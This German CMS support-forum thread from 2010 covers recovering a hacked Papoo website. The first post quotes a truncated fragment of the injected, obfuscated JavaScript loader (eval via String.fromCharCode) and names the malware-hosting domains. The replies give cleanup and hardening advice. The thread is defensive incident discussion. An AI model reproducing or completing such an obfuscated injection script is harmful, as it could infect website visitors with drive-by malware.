Support Telefon: 0228 / 280 56 68 - Mo-Fr. 09-18.00

Suche

Suche

Partner & Reseller CMS werden

Support

Forum Hilfe

Webiste "gehackt", Vorgehen beim Wiederherstellen?

Hallo,

eine unserer Webseiten (Papoo 3.5.0) wurde anscheinend "gehackt".
Der Zugriff mit Firefox und IE ist nicht mehr möglich, auch ins Backend komme ich nicht.



Der IE 8 meldet keinen Fehler, lädt die Seite allerdings auch nicht fertig.

Beim Versuch, mal nachzusehen, was da los ist, kriege ich unterschiedliche Infos, je nach Browser.

Firefox meldet "wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert."

Klicke ich auf "Warum wurde diese Seite blockiert" bekomme ich das Ergebnis "Welche Befunde hat Google beim Besuch dieser Website festgestellt?

Bei 2 Seite(n) von insgesamt 3 Seiten dieser Website, die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am 2010-10-26 und verdächtiger Content wurde auf dieser Website zuletzt am 2010-10-26 gefunden.

Malicious software includes 1 exploit(s). Successful infection resulted in an average of 4 new process(es) on the target machine.

Die Malware wird in 2 Domain(s) gehostet, darunter izraijaa.com/, nuzno.us/.

Bei der Verteilung von Malware an Besucher dieser Website fungieren anscheinend 1 Domain(s) als Überträger, darunter flliminotti.com/."


Bei IE wird die Seite garnicht geladen. Gehe ich dort in den Quelltext wird ab Zeile 91 anscheinend ein Script eingebunden, der etwa so aussieht: html><body><script>win=window;gar=win['String'];ga='l';g=win['eva'+ga];sf=gar.fromCharCode;g(sf(4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,...

Hat jemand Erfahrung mit diesem Verhalten?
Wie kann ich beim Wiederherstellen vorgehen?
Die Seite lief seit ca. 3,5 Jahren problemlos.

Ich bin für jeden Hinweis dankbar.

Gruß
Stefan


Von casp am 02.11.2010; 16:33:28 Uhr [646 Hits] Kunde Papoo Pro

Re: Webiste "gehackt", Vorgehen beim Wiederherstellen?

Hi,

vermutlich wird auch hier wieder ein unsicheres FTP Passwort die Ursache sein:
http://www.papoo.de/blog/sichere-passwoerter-bei-ftp-zugaengen.html

Darauf weisen wir schon seit Jahren immer wieder hin.

Wiederherstellen kannst du das auf 2 Arten.

1) Du öffnest alle index.html Seiten die vorhanden sind und entfernst den Inhalt

2) Du führst ein Update durch und überträgst nur die Inhalte aus der Datenbank sowie die Bilder und evtl. vorhandene Downloaddokumente.

Um wieder ins Backend zu kommen solltest du im Browser Javascript deaktivieren im Firefox, z.B. mit der Erweiterung "No Script", dann besteht kein Risiko mehr.

Weiterhin würde ich einen kompletten Virenscan deines Rechners vorschlagen und evtl. auch dort eine komplette Neuinstallation vorschlagen. Onlinebanking würde ich bis dahin nicht mehr machen.

Weiterhin mußt du Google noch darauf hinweisen dass die Seite wieder sauber ist.

Viele Grüße,

Carsten



Von Carsten Euwens am 03.11.2010; 08:34:07 Uhr [201 Hits] Kunden Papoo Enterprise (manuell)

Re: Webiste "gehackt", Vorgehen beim Wiederherstellen?

Hallo Carsten,

vielen Dank für die Tipps, die Seite ist wieder gesäubert.


Der Script war in den templates untergebracht, jeweils in der Datei "index.html"
Das war zum Glück einfach zu finden, das das Änderungsdatum nicht mit dem der anderen Daetein übereinstimmte.
Ich habe trotzdem zur Vorsicht ein kompettes Backup einschliesslich des Sicherheitspatchs eingespielt.

Interessanterweise wurde vorgestern eine weitere Seite (Papoo 3.7.5 light) auf die gleiche Weise "optimiert"

Die zu säubern war dann nicht mehr schwer...


Ausschliessen möchte ich mal als Ursache ein unsicheres FTP-Password, dass erraten wurde: das Kennwort bestand bei der ersten Seite aus 14 bunt gemischten Zeichen, wie in eurem Blog-Eintrag.

Der letzte FTP-Zugriff auf die erste Seite fand im Juli statt (Sicherung der Datenbankbackups), bei der zweiten Seite im Oktober.

Meinen Rechner habe ich mit drei Virenscannern komplett abgesucht, nichts gefunden. Allerdings hatte ich vor ca. 2 Monaten einen Trojaner.

Als FTP-Programm nutze ich Filezilla. Vielleicht liegt dort der Haken: die Serverzugänge liegen im Klartext in einer xml-Datei, wer die in die Finger kriegt, braucht sie nur zu öffnen.

Zweiter Knackpunkt: da ich kein SFTP eingestellt habe, besteht die Möglichkeit, dass ein Sniffer die Login-Dateien mitgeschnitten hat.
Klar stelle ich jetzt auf SFTP um.

Gruß
Stefan


Von casp am 05.11.2010; 17:54:25 Uhr [250 Hits] Kunde Papoo Pro

Re: Webiste "gehackt", Vorgehen beim Wiederherstellen?

Hi,

hast du in den Logfiles des Servers nachgeschaut wann die FTP Zugriffe waren?

Viele Grüße,

Carsten



Von Carsten Euwens am 06.11.2010; 15:37:15 Uhr [211 Hits] Kunden Papoo Enterprise (manuell)

Re: Webiste "gehackt", Vorgehen beim Wiederherstellen?

Hallo Carsten,

der Zugriff war am 01.11.10 kurz vor 23 Uhr.


Gruß
Stefan


Von casp am 10.11.2010; 15:59:09 Uhr [149 Hits] Kunde Papoo Pro

Sie müssen sich anmelden, um einen Beitrag schreiben zu können.

Anfrage stellen

Warenkorb

Derzeit befindet sich nichts in Ihrem Warenkorb.
#start#

Facebook

Newsletter abonnieren.

Ihre Daten

Login

Login




Registrierung.
. Passwort vergessen?
.

Seminarkalender

Mo Di Mi Do Fr Sa So
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31
.

xxnoxx_zaehler

.

xxnoxx_zaehler